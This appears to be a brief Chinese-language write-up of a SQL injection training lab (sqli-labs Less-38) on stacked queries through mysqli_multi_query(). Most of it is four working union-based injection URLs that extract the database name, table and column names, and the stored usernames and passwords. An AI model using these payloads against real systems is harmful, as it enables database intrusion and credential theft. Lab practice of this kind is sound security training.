Less(38)GET-Stacked Query Injection -String
1.查看一下php,
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)
分号我们可以加入注入的新的语句
2.爆破:
(1)爆库:?id=0%FE' union select 1,2,database() %23
(2)爆表:?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
(3)爆列名:?id=0%FE' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" %23
(4)爆值:?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23